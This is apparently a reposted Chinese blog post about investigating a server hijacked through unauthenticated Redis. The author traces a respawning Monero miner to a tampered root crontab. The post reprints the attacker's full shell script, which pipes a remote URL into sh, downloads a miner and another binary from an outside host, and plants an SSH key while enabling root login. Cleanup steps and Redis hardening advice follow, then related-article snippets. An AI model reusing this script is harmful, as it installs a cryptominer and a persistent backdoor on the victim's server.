朋友的一个项目说接到阿里云的告警,提示服务器已沦为肉鸡,网络带宽被大量占用,网站访问很慢,通过SSH远程管理服务器还频繁断开链接。朋友不知如何下手,便邀请我帮忙处理。
阿里云的安全告警邮件内容:
在没有查到异常进程之前我是先把操作系统的带宽&端口用iptables 做了限制这样能保证我能远程操作服务器才能查找原因.
在各种netstat –ntlp 的查看下没有任何异常。在top 下查到了有异常进程 还有些异常的这里就截图一个:
结果果断把进程给kill -9 了 没想到再去ps的时候又来了 意思就是会自动启动它。
这就让我想到了crond 这个自动任务果不其然 /var/sprool/cron/root 这个文件被人做了手脚 而且是二进制的,果断又给删除了,以为这下没事了结果过了两分钟这个文件又来这个就引起我主要了联想到了是不是有说明守护进程了 这样的事情肯定是有守护进程在才会发生的了。于是我去百度了下 jyam -c x -M stratum+tcp 果不其然 确实有这样的攻击,这个攻击是由于redis 未授权登陆漏洞引起导致黑客利用的。
漏洞概述
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访 问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。
漏洞描述
Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的” 。
Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。
因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis 绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。
利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。 (导致可以执行任何操作)
漏洞影响
Redis 暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下可受影响而导致被利用。
在网上我查到这个被黑客编译成二进制的源文件代码 (关于redis 未授权登陆安全措施:
1 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379. 防火墙控制好允许IP连接就好
2 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
3 配置rename-command CONFIG "RENAME_CONFIG", 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
4是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如config
)
##网上查到脚本内容大致如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep yam || /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr" >> /var/spool/cron/root
echo "*/5 * * * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &" >> /var/spool/cron/root
ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr
fi
if [ ! -f "/opt/gg3lady" ]; then
curl -f -L https://r.chanstring.com/api/download/gg3lady_`uname -i` -o /opt/gg3lady
chmod +x /opt/gg3lady
fi
# yam=$(ps auxf | grep yam | grep -v grep | wc -l)
# gg3lady=$(ps auxf | grep gg3lady | grep -v grep | wc -l)
# cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
# curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg3lady=$gg3lady\&arch=`uname -i`
于是终于找到源头了,
下面我们来分析下这个脚本
整个脚本的大致就这样
处理方法只要把 /var/spool/cron/root 删除 /opt/yam/yam 删除 /opt/gg3lady 删除 .ssh/KHK75NEOiq 删除
把gg3lady yam 进程结束 还有就是sshd_confg 文件还原 应该就没问题了。但是为了安全起见还是希望重装服务器,不确保别人不留其他的漏洞
转发:http://my.oschina.net/wushuicheng/blog/694982
相关推荐
Celery 4.0 Redis未授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题...
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未...
python编写的redis未授权访问漏洞检测脚本
当Redis配置不当,允许未授权的外部访问时,攻击者可以利用这个漏洞获取服务器的敏感信息,甚至完全控制服务器。 1. **Redis未授权访问**:默认情况下,Redis仅允许本地主机(127.0.0.1)连接。但若配置文件中`bind...
将生成的目录保存到 kitty.txt远程登陆redis命令获得当前备份路径的命令设置备份路径的命令config set dir /root/.ssh设置上传公
未授权访问Redis可能导致敏感数据泄露或被恶意利用,因此,运维人员必须确保配置正确,限制网络访问,启用身份验证,并定期更新安全策略。例如,可以通过设置`requirepass`参数来启用密码保护,防止未经授权的访问。...
下面将详细介绍Redis的特性、使用方法以及在Windows上启动Redis服务器的过程。 首先,Redis的核心特性包括: 1. **数据结构丰富**:Redis支持多种数据结构,如字符串、哈希、列表、集合和有序集合,这使得它在处理...
默认情况下,Redis服务器监听所有IP地址,为了提高安全性,我们需要限制哪些IP地址可以访问Redis服务器。 要控制访问Redis的IP,我们需要修改Redis配置文件。Redis配置文件的路径可能不同,例如/usr/local/redis-...
1. 访问控制:配置防火墙规则,限制对Redis服务器的访问,仅允许必要的IP地址连接。 2. 密码保护:开启Redis的requirepass配置,设置密码认证,防止未授权访问。 3. 绑定IP:通过bind配置只监听特定IP,避免监听所有...
通过理解这些基本概念和特性,你可以根据实际需求有效地利用 Redis 缓存服务器来优化应用程序性能,提高系统响应速度,并确保数据的安全性和一致性。无论是在 web 应用、数据统计、实时分析还是消息传递等领域,...
Linux 下安装 Redis 服务器 Linux 下安装 Redis 服务器需要按照以下步骤进行: 一、准备安装包 在 Linux 下安装 Redis 服务器之前,需要先准备好 Redis 的安装包。可以从 Redis 的官方网站下载最新版本的安装包,...
在Windows环境下搭建Redis服务器,可以实现跨平台的数据管理和服务。以下将详细介绍如何在Windows下安装和使用Redis服务器。 首先,从描述中我们可以看出,这里有三个不同版本的Redis可供选择:v2.36到v63-65、v...
**Java操作Redis服务器端Demo** 在Java中,我们可以使用Jedis或Lettuce库来操作Redis。这里以Jedis为例,演示基本的Redis操作。 1. **添加Jedis依赖** 如果使用Maven,将以下依赖添加到`pom.xml`文件中: ```...
9. **安全措施**:为了防止未经授权的访问,需要设置 Redis 的访问控制,例如绑定监听地址、启用密码认证等。避免在生产环境中使用默认的 6379 端口,可以降低被攻击的风险。 10. **数据一致性**:在主从复制中,...
- **连接管理**:RedisDesktopManager允许用户添加、编辑和删除Redis服务器的连接配置,包括主机名、端口、密码等信息。 - **键值查看与编辑**:用户可以通过该工具浏览和编辑Redis中的键值对,支持各种数据类型。...
比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis...
Redis 主从服务器配置 Redis 作为一个 NoSQL 型数据库,具有高性能、高扩展性和高可靠性的特点。在本文中,我们将详细介绍如何配置 Redis 主从服务器,以实现高可用性和高性能的缓存系统。 Redis 概述 Redis 是一...